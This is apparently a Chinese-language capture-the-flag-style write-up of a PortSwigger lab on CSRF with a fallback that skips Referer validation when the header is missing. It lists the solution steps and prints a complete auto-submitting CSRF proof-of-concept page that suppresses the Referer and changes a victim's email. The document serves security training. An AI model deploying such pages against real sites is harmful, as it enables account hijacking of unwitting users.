Lab: CSRF where Referer validation depends on header being present CSRF，其中Referer 验证取决于标头是否存在

Referer 的验证取决于是否存在标头

某些应用程序Referer会在请求中存在标头时验证标头，但如果省略标头则跳过验证。

在这种情况下，攻击者可以通过某种方式制作他们的 CSRF 漏洞利用，从而导致受害者用户的浏览器Referer在结果请求中删除标头。有多种方法可以实现这一点，但最简单的方法是在承载 CSRF 攻击的 HTML 页面中使用 META 标记：

<meta name="referrer" content="never">
本实验室的电子邮件更改功能易受 CSRF 攻击。它试图阻止跨域请求，但具有不安全的回退。

要解决该实验，请使用您的漏洞利用服务器托管一个 HTML 页面，该页面使用CSRF 攻击来更改查看者的电子邮件地址。

您可以使用以下凭据登录自己的帐户： wiener:peter

使用您的浏览器通过 Burp Suite 代理流量，登录您的帐户，提交“更新电子邮件”表单，然后在您的代理历史记录中找到生成的请求。
将请求发送到 Burp Repeater 并观察如果您更改 Referer HTTP 标头中的域，则请求将被拒绝。
完全删除 Referer 标头并观察请求现在已被接受。
创建并托管一个概念证明漏洞利用，如没有防御实验室的CSRF 漏洞的解决方案中所述。包含以下 HTML 以抑制 Referer 标头：
<meta name="referrer" content="no-referrer">
存储漏洞，然后单击“交付给受害者”以解决实验室问题。

代码如下：

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
<head><meta name="referrer" content="never"></head>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://ac611fbf1f98673d80f336f800780051.web-security-academy.net/my-account/change-email" method="POST">
      <input type="hidden" name="email" value="ExtArE&#64;qq&#46;com" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

两个要点：

• head标签需要添加
• script脚本不能忘记